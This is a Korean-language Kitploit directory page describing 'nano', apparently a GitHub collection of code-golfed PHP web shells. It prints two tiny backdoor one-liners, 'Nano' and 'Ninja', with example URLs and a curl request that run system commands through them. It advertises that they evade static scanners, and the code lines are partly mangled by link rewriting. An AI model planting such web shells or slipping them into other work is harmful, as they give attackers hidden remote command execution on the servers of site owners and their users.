Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
nano — Nano는 은밀성을 위해 코드 골프 방식으로 작성된 PHP 웹 셸 계열입니다. | Kitploit
도구/GitHubGitHub/s0md3v/nano
Payload GenerationShellcodeWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubs0md3v/nano

nano

Nano는 은밀성을 위해 코드 골프 방식으로 작성된 PHP 웹 셸 계열입니다.

저장소 보기
449916년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

nano

nano는 PHP 웹쉘 계열로, 극도로 은밀하고 효율적이도록 코드 골프가 적용되었습니다.
계속 지켜봐 주세요. 앞으로 더 많은 웹쉘을 여기에 업로드할 예정입니다.

Nano

root@kitploit:~
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);

특징

  • 35바이트 크기
  • 정적 코드 스캐너로 탐지 불가
  • 인증 지원

사용법

http://example.com/nano.php?f=함수&c=명령어&p=비밀번호

f는 함수
c는 명령어
p는 비밀번호

예를 들어, 아래 코드는 ls 명령을 실행합니다:

http://example.com/nano.php?f=system&c=ls&p=비밀번호

Ninja

root@kitploit:~
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);

특징

  • 93바이트 크기
  • 완전 탐지 불가

사용법

이건 좀 복잡합니다.
system(ls)를 실행하고 싶다고 가정해 봅시다. 그러면 system~ls로 작성한 후 base64로 인코딩하면 c3lzdGVtKGxzKQ==가 됩니다.
이제 시작 부분에 1자를 추가합니다. 'x'라고 하면 xc3lzdGVtKGxzKQ==가 됩니다.
이제 터미널을 열고 다음 명령을 입력하세요.
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
너무 복잡하다고요? 대신 핸들러를 사용할 수 있습니다.

핸들러

그 외 모든 것

이것은 제 첫 PHP 작업물입니다. 제가 한 방식을 더 좋은 방식으로 할 수 있는 방법이 있다면 알려주시거나 풀 리퀘스트를 열어 주세요.
nano 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 이는 기본적으로 재배포 또는 수정하려면 제게 크레딧을 제공해야 한다는 의미입니다.

도구 다운로드